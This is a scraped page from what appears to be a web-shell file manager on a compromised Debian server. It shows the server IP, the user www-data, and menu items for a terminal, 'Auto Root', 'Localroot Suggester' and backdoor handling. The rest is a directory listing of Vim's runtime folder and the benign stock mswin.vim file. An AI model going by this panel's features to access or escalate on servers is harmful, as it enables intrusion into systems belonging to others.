Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.35
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
vim /
vim80 /
Delete
Unzip
Name
Size
Permission
Date
Action
autoload
[ DIR ]
drwxrwxrwx
2024-03-12 22:00
colors
[ DIR ]
drwxrwxrwx
2024-03-12 22:00
compiler
[ DIR ]
drwxr-xr-x
2024-03-12 22:00
doc
[ DIR ]
drwxr-xr-x
2024-03-12 22:00
ftplugin
[ DIR ]
drwxr-xr-x
2024-03-12 22:00
indent
[ DIR ]
drwxr-xr-x
2024-03-12 22:00
keymap
[ DIR ]
drwxr-xr-x
2024-03-12 22:00
lang
[ DIR ]
drwxrwxrwx
2024-03-12 22:00
macros
[ DIR ]
drwxr-xr-x
2024-03-12 22:00
pack
[ DIR ]
drwxr-xr-x
2017-06-20 11:49
plugin
[ DIR ]
drwxrwxrwx
2024-03-12 22:00
print
[ DIR ]
drwxr-xr-x
2024-03-12 22:00
spell
[ DIR ]
drwxrwxrwx
2024-03-12 22:00
syntax
[ DIR ]
drwxr-xr-x
2024-03-12 22:00
tutor
[ DIR ]
drwxrwxrwx
2024-03-12 22:00
bugreport.vim
1.91
KB
-rw-r--r--
2022-06-19 12:00
debian.vim
1.7
KB
-rw-r--r--
2022-06-19 12:00
defaults.vim
3.84
KB
-rw-r--r--
2022-06-19 12:00
delmenu.vim
645
B
-rw-r--r--
2022-06-19 12:00
evim.vim
2.09
KB
-rw-r--r--
2022-06-19 12:00
filetype.vim
69.77
KB
-rw-r--r--
2022-06-19 12:00
ftoff.vim
280
B
-rw-r--r--
2022-06-19 12:00
ftplugin.vim
971
B
-rw-r--r--
2022-06-19 12:00
ftplugof.vim
337
B
-rw-r--r--
2022-06-19 12:00
gvimrc_example.vim
1.56
KB
-rw-r--r--
2022-06-19 12:00
indent.vim
767
B
-rw-r--r--
2022-06-19 12:00
indoff.vim
282
B
-rw-r--r--
2022-06-19 12:00
menu.vim
37.62
KB
-rw-r--r--
2022-06-19 12:00
mswin.vim
2.59
KB
-rw-r--r--
2022-06-19 12:00
optwin.vim
56.15
KB
-rw-r--r--
2022-06-19 12:00
rgb.txt
17.36
KB
-rw-r--r--
2022-06-19 12:00
scripts.vim
10.52
KB
-rw-r--r--
2022-06-19 12:00
synmenu.vim
36.05
KB
-rw-r--r--
2022-06-19 12:00
vimrc_example.vim
1.35
KB
-rw-r--r--
2022-06-19 12:00
Save
Rename
" Set options and add mapping such that Vim behaves a lot like MS-Windows " " Maintainer: Bram Moolenaar <Bram@vim.org> " Last change: 2012 Jul 25 " bail out if this isn't wanted (mrsvim.vim uses this). if exists("g:skip_loading_mswin") && g:skip_loading_mswin finish endif " set the 'cpoptions' to its Vim default if 1 " only do this when compiled with expression evaluation let s:save_cpo = &cpoptions endif set cpo&vim " set 'selection', 'selectmode', 'mousemodel' and 'keymodel' for MS-Windows behave mswin " backspace and cursor keys wrap to previous/next line set backspace=indent,eol,start whichwrap+=<,>,[,] " backspace in Visual mode deletes selection vnoremap <BS> d " CTRL-X and SHIFT-Del are Cut vnoremap <C-X> "+x vnoremap <S-Del> "+x " CTRL-C and CTRL-Insert are Copy vnoremap <C-C> "+y vnoremap <C-Insert> "+y " CTRL-V and SHIFT-Insert are Paste map <C-V> "+gP map <S-Insert> "+gP cmap <C-V> <C-R>+ cmap <S-Insert> <C-R>+ " Pasting blockwise and linewise selections is not possible in Insert and " Visual mode without the +virtualedit feature. They are pasted as if they " were characterwise instead. " Uses the paste.vim autoload script. " Use CTRL-G u to have CTRL-Z only undo the paste. exe 'inoremap <script> <C-V> <C-G>u' . paste#paste_cmd['i'] exe 'vnoremap <script> <C-V> ' . paste#paste_cmd['v'] imap <S-Insert> <C-V> vmap <S-Insert> <C-V> " Use CTRL-Q to do what CTRL-V used to do noremap <C-Q> <C-V> " Use CTRL-S for saving, also in Insert mode noremap <C-S> :update<CR> vnoremap <C-S> <C-C>:update<CR> inoremap <C-S> <C-O>:update<CR> " For CTRL-V to work autoselect must be off. " On Unix we have two selections, autoselect can be used. if !has("unix") set guioptions-=a endif " CTRL-Z is Undo; not in cmdline though noremap <C-Z> u inoremap <C-Z> <C-O>u " CTRL-Y is Redo (although not repeat); not in cmdline though noremap <C-Y> <C-R> inoremap <C-Y> <C-O><C-R> " Alt-Space is System menu if has("gui") noremap <M-Space> :simalt ~<CR> inoremap <M-Space> <C-O>:simalt ~<CR> cnoremap <M-Space> <C-C>:simalt ~<CR> endif " CTRL-A is Select all noremap <C-A> gggH<C-O>G inoremap <C-A> <C-O>gg<C-O>gH<C-O>G cnoremap <C-A> <C-C>gggH<C-O>G onoremap <C-A> <C-C>gggH<C-O>G snoremap <C-A> <C-C>gggH<C-O>G xnoremap <C-A> <C-C>ggVG " CTRL-Tab is Next window noremap <C-Tab> <C-W>w inoremap <C-Tab> <C-O><C-W>w cnoremap <C-Tab> <C-C><C-W>w onoremap <C-Tab> <C-C><C-W>w " CTRL-F4 is Close window noremap <C-F4> <C-W>c inoremap <C-F4> <C-O><C-W>c cnoremap <C-F4> <C-C><C-W>c onoremap <C-F4> <C-C><C-W>c " restore 'cpoptions' set cpo& if 1 let &cpoptions = s:save_cpo unlet s:save_cpo endif